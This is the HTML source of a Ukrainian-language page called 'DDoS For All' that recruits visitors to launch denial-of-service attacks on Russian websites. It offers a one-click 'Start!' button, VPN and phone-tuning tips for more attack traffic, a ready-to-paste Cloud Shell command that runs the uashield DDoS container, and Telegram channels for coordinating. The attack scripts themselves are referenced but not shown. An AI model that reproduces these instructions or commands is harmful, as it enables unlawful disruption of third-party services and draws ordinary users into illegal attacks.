<!DOCTYPE html>

<html lang="uk">
	<head>
		<meta charset="utf-8">
		<link rel="shortcut icon" href="meta/favicon.png">
		<title>DDoSFA</title>
		<link rel="stylesheet" href="styles/style.css">
		<link rel="canonical" href="https://ddos-separ.ml">
		<link rel="manifest" href="manifest.json">


		<!-- Meta tags -->
		<link rel="icon" type="image/png" href="meta/apple-touch-icon.png">
		<link rel="apple-touch-icon" href="meta/apple-touch-icon.png">
		<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

		<meta name="mobile-web-app-capable" content="yes">
		<meta name="apple-mobile-web-app-capable" content="yes">
		<meta name="application-name" content="DDoSFA">
		<meta name="apple-mobile-web-app-title" content="DDoSFA">
		<meta name="theme-color" content="#00ffd6">
		<meta name="msapplication-navbutton-color" content="#00ffd6">
		<meta name="msapplication-starturl" content="/">

		<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
		<meta name="HandheldFriendly" content="True">
		<meta http-equiv="cache-control" content="cache">


		<meta name="title" content="DDoSFA">
		<meta name="description" content="♦ ☞Проста хакерська атака на сайти рф!✔">
		<meta name="image" content="https://github.com/BogdanDevUA/simple-ddos/raw/master/meta/image.jpg">
		<meta name="theme-color" content="dark">
		<meta name="author" content="BogdanDevUA">

		<!-- Open Graph-->
		<meta property="og:type" content="website">
		<meta property="og:url" content="https://ddos-separ.ml">
		<meta property="og:title" content="DDoSFA">
		<meta property="og:description" content="♦ ☞Проста хакерська атака на сайти рф!✔">
		<meta property="og:image" content="https://github.com/BogdanDevUA/simple-ddos/raw/master/meta/image.jpg">
		<meta property="og:image:alt" content="DDoS Attack">

		<!-- Twitter -->
		<meta property="twitter:card" content="summary_large_image">
		<meta property="twitter:url" content="https://ddos-separ.ml">
		<meta property="twitter:title" content="DDoSFA">
		<meta property="twitter:description" content="♦ ☞Проста хакерська атака на сайти рф!✔">
		<meta property="twitter:image" content="https://github.com/BogdanDevUA/simple-ddos/raw/master/meta/image.jpg">

		<link rel="alternate" type="application/rss+xml" title="Укрінформ - актуальні новини України та світу RSS" href="https://www.ukrinform.ua/rss/block-lastnews">

		<script src="scripts/ats.js"></script>

		<script type="application/ld+json"> 
			{
			  "@context": "http://www.schema.org",
			  "@type": "WebSite",
			  "name": "DDoS For All",
			  "url": "https://ddos-separ.ml"
			}
		</script>

		<!--
		<div xmlns:v="http://rdf.data-vocabulary.org">
			<span typeof="v:Breadcrumb"><a href="http://ddos-separ.ml/" rel="v:url" property="v:title">ddos-separ.ml</a> › </span>
			<span typeof="v:Breadcrumb"><a href="http://ddos-separ.ml/" rel="v:url" property="v:title">☢Атака на сайти рф☢</a> › </span>
		</div>
		-->

		<!-- Google Tag Manager -->
		<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
		new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
		j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
		'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
		})(window,document,'script','dataLayer','GTM-KXBF8HS');</script>


	</head>
	<body>

		<top-nav data-active="">
			<a data-link="#" id="active">Головна</a>
			<a data-link="slideshow-container">Гайди</a>
			<a data-link="#pinboard">Pinboard</a>
			<a data-link="#how-a-work-site">Про сайт</a>
			<a href="javascript:void(0);" class="icon" onclick="topNav()">
			  <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-three-dots" viewBox="0 0 16 16">
			  	<path d="M3 9.5a1.5 1.5 0 1 1 0-3 1.5 1.5 0 0 1 0 3zm5 0a1.5 1.5 0 1 1 0-3 1.5 1.5 0 0 1 0 3zm5 0a1.5 1.5 0 1 1 0-3 1.5 1.5 0 0 1 0 3z"/>
			  </svg>
			</a> 
		</top-nav>

		<main>

			<div id="container">

				<div id="title" title="DDoS для всіх">DDoS For All</div>

				<span id="box" class="center">
					<button id="button" title="Валимо сайти рф!"><strong id="button-text">Старт!</strong></button>

					<p>Атакуємо: <span id="target">...</span></p>
					<p>Методом: <span id="method">...</span></p>

					<p id="attackCount">Атаковано разів: <span id="attacks">0</span></p>
				</span>

				<h2>Слава Україні! 
					<img src="images/ukraine.svg" alt="Ukraine" title="Ukraine" id="ua" class="flag">
				</h2>

				<div id="nav">
					<a href="resources">Ресурси</a>
					<span class="tooltip">
						QR-Код
						<div class="tooltiptext">
							<p>Скануй QR-Код</p>
							<img src="images/qr-code.svg" alt="QR-Код">
						</div>
					</span>
				</div>

			</div>
		</main>

		<hr>
		<div class="how instruction">
			<h3>Короткий інструктаж для початківців</h3>
			<p>Для початку:</p>
			<ul>
				<li><p>Завантажте програму VPN</p></li>
				<ul>
					<li>
						<a href="https://play.google.com/store/apps/details?id=vpn.russia_tap2free&hl=uk&gl=US"
						>На Андроїд</a>
					</li>
				</ul>
				<li><p>Зайдіть в програму</p></li>
				<li><p>Надайте потрібні дозволи для програми</p></li>
				<li><p>Натисніть на кнопку "Підключитись</p></li>
				<li><p>Зайдіть на сайт і натисніть кнопку "Старт!"</p></li>
				<li><p>Все!</p></li>
			</ul>
		</div>
		<hr>

		<!-- Гайд -->
		<div id="items">
			<p>Для найефективнішої атаки на <mark>російські сайти</mark> з телефону, радимо:</p>
			<p>1. Закрити всі лишні вкладки в браузері</p>
			<p>2. <mark>Зняти чохол</mark>, щоб телефон міцно не нагрівався</p>
			<p>3. Якщо є можливість - <mark>поставити на зарядку</mark></p>
			<p>4. <mark>Закрити</mark> всі попередньо відкриті програми (для збільшення потужності)</p>
			<p>5. Вимкнути режим енергозбереження</p>
			<p>6. Розташувати телефон в місці <mark>найкращої якості</mark> інтернету</p>
		</div>

		<hr>

		<h2 id="guides">Гайди по <i>DDoS</i> <img src="images/ukraine.svg" alt="Ukraine" title="Ukraine" class="flag"></h2>

		<!-- Slideshow container -->
		<slideshow-container>
		  <my-slide>
		    <guide-item>
					<div class="flex">
						<h3>Запуск <i>UA Cyber SHIELD</i> на <i>Google Cloud shell</i></h3>
						<img id="image" src="images/terminal.svg" alt="Термінал">
					</div>
					<ul>
						<li>
							<p>Заходимо на 
								<a href="https://shell.cloud.google.com/?show=terminal&fromcloudshell=true" target="_blank">
								сайт Cloud shell</a>
							</p>
						</li>
						<li>
							<p>І вводимо цю команду:</p>
							<code>
								<span color="blue">docker</span> <u>run ghcr.io/opengs/uashield:master</u> <span color="orange">512</span> <span color="red">true</span>
							</code>
						</li>
						<li>
							<p>Готово!</p>
						</li>
					</ul>
				</guide-item>
		  </my-slide>
		  <a id="prev" onclick="plusSlides(-1)">&#10094;</a>
			<a id="next" onclick="plusSlides(1)">&#10095;</a>
		</slideshow-container>
		<br>

		<!-- The dots/circles -->
		<div style="text-align:center">
		  <span class="dot" onclick="currentSlide(1)"></span>
		</div>


		<div class="flex center">
			<h2 id="communities">Чати та канали Telegram по дудосу</h2>
			<span id="ua-telegram"></span>
		</div>

		<ul id="channels">
			<li>
				<p><a href="tg://ddos_separ"><i>DDoS По країні сєпарів</i></a></p>
			</li>
		</ul>

		<h2 id="pin-table"><i>Pinboard (Якщо можна це так назвати)</i></h2>
		<ul id="pinboard">
			<li><p>Цьому сайту напевно більше ніж 2 місяці</span></p></li>
			<li>
				<p>Щоб дудос стабільно працював - потрібно не менше ніж <mark>400МБ</mark> оперативної пам'яті <img src="images/cpu.svg" alt="Процесор"></p>
			</li>
			<li><p>Взагалі то я раджу дудосити з віртуальних серверів, там набагато швидший інтернет, через те й вища швидкість дудосу</p></li>
			<li><p>Цілі для цього сайту беруться з UA Cyber SHIELD, а вони беруть цілі з <mark><i><u>ІТ Армії України</u></i></mark></p></li>
		</ul>

		<hr>

		<h2 id="how-a-work-site">Як цей сайт працює?</h2>

		<div class="how">
			<p>Цей сайт - це практично додаток на телефон або ноутбук</p>
			<p>Тут нічого не треба знати, тільки вміти читати</p>
			<h3>Він працює на такому прикладі:</h3>
			<p>Сидить собі російський сайт, і йому треба відізиватись на слово "Здоров!"</p>
			<p>І приходить хтось з Українським IP, і каже: Здоров!</p>
			<h3>Сайту байдуже.</h3>
			<p>Далі прийшов той самий, тільки з російським IP</p>
			<p>І каже: Здоров!</p>
			<p>Сайт сказав: Здоров!</p>
			<p>Таким чином, сайт з вашого телефону швидко заходить на сєпарський сайт і виходить</p>
			<h3>Подумаєте: і толку з того?</h3>
			<p>А уявіть якщо до того сайту прийде 200, 500, <mark>1000</mark> людей з російського IP</p>
			<p>Сайт не зможе всім відповісти, а тоді взагалі <mark>нікому не відповідатиме!</mark></p>
			<p>Сенс такої атаки - зупинити роботу сайту</p>
			<h3>От так.</h3>
			<p>Ще є такий приклад:</p>
			<p>Якщо самому лупашити російський танк палкою - нічого не вийде</p>
			<p>Але якщо 1000 людей будуть лупити того танка - то його точно завалять.</p>
		</div>
		
		<!-- Не зачіпай! -->
		<div id="frames"></div>

		<modal-box>
			<modal-content>

			  <modal-header>
			    <span id="close">&times;</span>
			    <h2 id="header"></h2>
			  </modal-header>

			  <modal-body>
			    <div id="text">
			    </div>
			  </modal-body>

			  <modal-footer>
			    <h3 id="footer"></h3>
			  </modal-footer>

			</modal-content>
		</modal-box>

	</body>
	<script src="dom.js"></script>
	<script src="scripts/random.js"></script>
	<script src="scripts/loader.js"></script>
	<script src="scripts/frame-manager.js"></script>
	<script src="scripts/worker.js"></script>
	<script src="scripts/main.js"></script>
	<script src="scripts/functions.js"></script>
</html>